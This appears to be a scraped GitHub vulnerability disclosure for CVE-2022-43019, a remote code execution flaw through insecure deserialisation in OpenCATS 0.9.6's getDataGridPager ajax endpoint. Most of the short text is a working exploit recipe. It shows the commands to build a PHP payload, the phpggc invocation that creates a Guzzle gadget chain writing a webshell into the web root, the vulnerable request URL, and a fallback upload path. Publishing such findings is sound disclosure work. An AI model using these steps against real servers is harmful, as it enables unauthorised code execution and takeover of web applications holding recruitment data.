Headline
CVE-2022-43019: opencats_zero-days/RCE_via_deserialisation.md at main · hansmach1ne/opencats_zero-days
OpenCATS v0.9.6 was discovered to contain a remote code execution (RCE) vulnerability via the getDataGridPager’s ajax functionality.
Remote Code Execution via insecure deserialization in OpenCats getDataGridPager’s ajax functionality.****Vulnerable code
How to achieve command execution
Useful information: OpenCats uses Guzzle, it can be used as a gadget chain.
It is possible to craft serialized object using phpggc tool, that has Guzzle gadget chain predefined.
Create payload that will be executed. I will use phpinfo().
echo “<?php phpinfo(); ?>” > /tmp/shell.phpCreate serialized payload with phpggc that will upload malicous shell to provided directory on web server.
./phpggc -u --fast-destruct Guzzle/FW1 /var/www/html/opencats/pwned.php /tmp/shell.php
Copy the payload inside ‘p’ parameter.
/ajax.php?f=getDataGridPager&i=1&p=PAYLOAD_FROM_PREVIOUS_STEPExecute webshell.
Ending notes. Upload location might vary from system to system, depending if www-data has write permission to web server’s root directory. In case / (web server’s root) is not writeable, upload a webshell to ‘/upload/pwned.php’ instead.